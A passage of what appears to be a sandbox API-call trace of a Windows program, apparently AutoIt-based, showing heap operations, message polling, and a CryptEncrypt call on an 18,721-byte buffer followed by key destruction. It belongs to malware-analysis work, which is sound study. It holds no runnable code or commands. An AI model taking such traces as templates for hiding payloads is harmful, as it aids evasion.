(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0033.597] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.598] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0033.598] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0033.599] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.599] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.599] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da158, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da158*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.599] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.599] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.600] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.600] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0033.600] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.600] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.600] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.600] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.600] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.600] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.600] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0033.601] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.601] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x4911, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x4920) returned 1 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.601] CharLowerBuffW (in: lpsz="byte[18721]", cchLength=0xb | out: lpsz="byte[18721]") returned 0xb [0033.601] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.602] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.602] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8bdb20*, pdwDataLen=0x6ae220*=0x4911, dwBufLen=0x4920 | out: pbData=0x8bdb20*, pdwDataLen=0x6ae220*=0x4920) returned 1 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.602] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0033.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.602] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.602] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.603] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.603] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0033.603] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.603] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.603] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.603] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0033.603] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.605] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0033.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.605] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0033.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.605] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0033.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0033.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.605] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.606] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0033.606] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.606] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0033.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.606] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.606] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 